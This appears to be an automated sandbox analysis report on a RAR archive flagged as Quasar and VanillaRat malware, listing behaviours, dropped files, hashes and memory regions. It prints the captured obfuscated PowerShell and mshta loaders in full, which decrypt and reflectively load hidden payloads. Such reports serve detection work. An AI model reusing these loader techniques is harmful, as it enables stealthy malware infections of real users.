Analysis Overview
SHA256
6d886767f487cd0bc1ee29c899540e2ccfe6f1d3253ea629acd8d397a0a84faa
Threat Level: Known bad
The file Password_Is_MadeByBKA.rar was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Vanilla Rat payload
Quasar payload
Suspicious use of NtCreateProcessExOtherParentProcess
Quasar RAT
Vanillarat family
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Checks BIOS information in registry
Indicator Removal: Clear Windows Event Logs
Deletes itself
Executes dropped EXE
Hide Artifacts: Hidden Window
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
Program crash
System Location Discovery: System Language Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Views/modifies file attributes
Suspicious use of SetWindowsHookEx
Modifies registry class
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-18 13:35
Signatures
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Vanillarat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win7-20240729-en
Max time kernel
18s
Max time network
18s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2336 wrote to memory of 2372 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe |
| PID 2336 wrote to memory of 2372 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe |
| PID 2336 wrote to memory of 2372 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Network
Files
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/2372-5-0x000007FEF636E000-0x000007FEF636F000-memory.dmp
memory/2372-6-0x000000001B450000-0x000000001B732000-memory.dmp
memory/2372-7-0x0000000002830000-0x0000000002838000-memory.dmp
memory/2372-8-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp
memory/2372-9-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp
memory/2372-10-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp
memory/2372-11-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win10-20240404-en
Max time kernel
60s
Max time network
19s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2284 created 592 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\system32\winlogon.exe |
| PID 2284 created 592 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\system32\winlogon.exe |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation | C:\Windows\$sxr-mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2284 set thread context of 3432 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 2284 set thread context of 4544 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 2284 set thread context of 1048 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 2284 set thread context of 1592 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance | C:\Windows\$sxr-mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{23c621aa-c62a-4f76-a3f3-8649b062a849}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e83bb8f9-a68a-4d3d-86e9-ad9c86c68f3f}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{575ae588-542b-4055-8c53-3889cbfc47d9}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{7f946606-f3f4-4359-8927-7cef8af0882f}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{2c584f31-3b18-4797-aa2d-cf346a1045a5}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{4c2587e7-63b4-4603-8c1e-fc8da29766c3}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{73526fce-b2c6-443a-9feb-27e802959c79}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.211.222.173.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | f7722b62b4014e0c50adfa9d60cafa1c |
| SHA1 | f31c17e0453f27be85730e316840f11522ddec3e |
| SHA256 | ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa |
| SHA512 | 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4 |
memory/2284-4-0x00007FF884DD3000-0x00007FF884DD4000-memory.dmp
memory/2284-9-0x00000185EE970000-0x00000185EE992000-memory.dmp
memory/2284-10-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
memory/2284-15-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
memory/2284-16-0x00000185EED80000-0x00000185EEDF6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xbn1qp2l.tbv.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2284-27-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
memory/2284-32-0x00000185A8000000-0x00000185A8024000-memory.dmp
memory/2284-36-0x00007FF8A1910000-0x00007FF8A19BE000-memory.dmp
memory/2284-35-0x00007FF8A1F80000-0x00007FF8A215B000-memory.dmp
memory/2284-37-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
memory/2284-38-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
memory/2284-39-0x00007FF884DD3000-0x00007FF884DD4000-memory.dmp
memory/2284-40-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
memory/2284-41-0x0000018598290000-0x0000018598CE0000-memory.dmp
memory/2284-43-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
memory/2284-44-0x0000018598CE0000-0x0000018598D86000-memory.dmp
memory/2284-59-0x0000018598D90000-0x0000018598DE6000-memory.dmp
memory/2284-60-0x0000018598DF0000-0x0000018598E48000-memory.dmp
memory/2284-61-0x0000018598E50000-0x0000018598E72000-memory.dmp
memory/2284-64-0x00007FF8A1F80000-0x00007FF8A215B000-memory.dmp
memory/2284-73-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
memory/3432-76-0x0000000140000000-0x0000000140004000-memory.dmp
memory/3432-74-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4544-78-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2284-72-0x0000018599100000-0x000001859910A000-memory.dmp
memory/2284-79-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
memory/4544-81-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2284-82-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 98447a7f26ee9dac6b806924d6e21c90 |
| SHA1 | a67909346a56289b7087821437efcaa51da3b083 |
| SHA256 | c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed |
| SHA512 | c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b |
C:\Windows\$sxr-cmd.exe
| MD5 | 94912c1d73ade68f2486ed4d8ea82de6 |
| SHA1 | 524ab0a40594d2b5f620f542e87a45472979a416 |
| SHA256 | 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9 |
| SHA512 | f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d |
memory/2252-138-0x000002BF74390000-0x000002BF743B4000-memory.dmp
memory/2252-141-0x00007FF8A1F80000-0x00007FF8A215B000-memory.dmp
memory/2252-142-0x00007FF8A1910000-0x00007FF8A19BE000-memory.dmp
memory/2284-145-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
memory/2284-146-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
memory/2284-147-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp
memory/2252-148-0x000002BF74BB0000-0x000002BF74CE8000-memory.dmp
